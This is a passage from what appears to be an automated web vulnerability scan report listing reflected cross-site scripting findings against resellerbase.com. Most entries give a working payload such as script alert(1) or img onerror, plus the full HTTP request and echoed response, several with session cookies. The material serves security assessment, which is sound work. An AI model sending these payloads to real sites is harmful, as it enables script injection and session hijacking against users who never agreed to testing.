The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 560fa"><img%20src%3da%20onerror%3dalert(1)>9c6fad0d53e5ede0b was submitted in the cat parameter. This input was echoed as 560fa\"><img src=a onerror=alert(1)>9c6fad0d53e5ede0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/personals-dating/search.php?cat=13560fa"><img%20src%3da%20onerror%3dalert(1)>9c6fad0d53e5ede0b&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=13560fa\"><img src=a onerror=alert(1)>9c6fad0d53e5ede0b">
...[SNIP]...

2.193. http://www.resellerbase.com/adult/personals-dating/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9646"><img%20src%3da%20onerror%3dalert(1)>9747fc21928 was submitted in the cat parameter. This input was echoed as e9646\"><img src=a onerror=alert(1)>9747fc21928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adult/personals-dating/search.php?cat=13e9646"><img%20src%3da%20onerror%3dalert(1)>9747fc21928&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=13e9646\"><img src=a onerror=alert(1)>9747fc21928">
...[SNIP]...

2.194. http://www.resellerbase.com/adult/personals-dating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bb656<a>0656bacf859 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/search.php?keyword=search...bb656<a>0656bacf859&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?keyword=search...bb656<a>0656bacf859&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.195. http://www.resellerbase.com/adult/personals-dating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7ab33<script>alert(1)</script>7aa4926eece was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/search.php?7ab33<script>alert(1)</script>7aa4926eece=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?7ab33<script>alert(1)</script>7aa4926eece=1 was not found on this server.</p>
...[SNIP]...

2.196. http://www.resellerbase.com/adult/personals-dating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2e9a6<a>3b35bdc676b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/search.php?keyword=search...&Submit3=Search&opt=22e9a6<a>3b35bdc676b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?keyword=search...&Submit3=Search&opt=22e9a6<a>3b35bdc676b was not found on this server.</p>
...[SNIP]...

2.197. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4c84<script>alert(1)</script>3fb7c9cf3cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultb4c84<script>alert(1)</script>3fb7c9cf3cd/personals-dating/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultb4c84<script>alert(1)</script>3fb7c9cf3cd/personals-dating/themes/ was not found on this server.</p>
...[SNIP]...

2.198. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13ebe<script>alert(1)</script>a5a428dde94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating13ebe<script>alert(1)</script>a5a428dde94/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating13ebe<script>alert(1)</script>a5a428dde94/themes/ was not found on this server.</p>
...[SNIP]...

2.199. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97488<script>alert(1)</script>4e8f042eb74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes97488<script>alert(1)</script>4e8f042eb74/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.200. http://www.resellerbase.com/adult/personals-dating/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59668<script>alert(1)</script>bf0669f4bf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/?59668<script>alert(1)</script>bf0669f4bf8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/?59668<script>alert(1)</script>bf0669f4bf8=1 was not found on this server.</p>
...[SNIP]...

2.201. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 26b21<script>alert(1)</script>29b9308fcc1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult26b21<script>alert(1)</script>29b9308fcc1/personals-dating/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult26b21<script>alert(1)</script>29b9308fcc1/personals-dating/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.202. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f91f9<script>alert(1)</script>470dd69a419 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingf91f9<script>alert(1)</script>470dd69a419/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingf91f9<script>alert(1)</script>470dd69a419/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.203. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d1c5<script>alert(1)</script>ac06ce9c40f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes5d1c5<script>alert(1)</script>ac06ce9c40f/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes5d1c5<script>alert(1)</script>ac06ce9c40f/kosmos/ was not found on this server.</p>
...[SNIP]...

2.204. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6c338<script>alert(1)</script>423da27136b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos6c338<script>alert(1)</script>423da27136b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos6c338<script>alert(1)</script>423da27136b/ was not found on this server.</p>
...[SNIP]...

2.205. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd407<script>alert(1)</script>fb6d51ce697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/?cd407<script>alert(1)</script>fb6d51ce697=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/?cd407<script>alert(1)</script>fb6d51ce697=1 was not found on this server.</p>
...[SNIP]...

2.206. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 836c7<script>alert(1)</script>5a2c980ea78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult836c7<script>alert(1)</script>5a2c980ea78/personals-dating/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult836c7<script>alert(1)</script>5a2c980ea78/personals-dating/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.207. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b794<script>alert(1)</script>451e90305c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating4b794<script>alert(1)</script>451e90305c4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating4b794<script>alert(1)</script>451e90305c4/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.208. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61887<script>alert(1)</script>7b0fba868f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes61887<script>alert(1)</script>7b0fba868f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes61887<script>alert(1)</script>7b0fba868f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.209. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c304f<script>alert(1)</script>edd0e6e3249 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosc304f<script>alert(1)</script>edd0e6e3249/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosc304f<script>alert(1)</script>edd0e6e3249/images/ was not found on this server.</p>
...[SNIP]...

2.210. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c0fc2<script>alert(1)</script>69a8d555bc1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesc0fc2<script>alert(1)</script>69a8d555bc1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesc0fc2<script>alert(1)</script>69a8d555bc1/ was not found on this server.</p>
...[SNIP]...

2.211. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 91945<script>alert(1)</script>4c9e5f211d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/?91945<script>alert(1)</script>4c9e5f211d9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
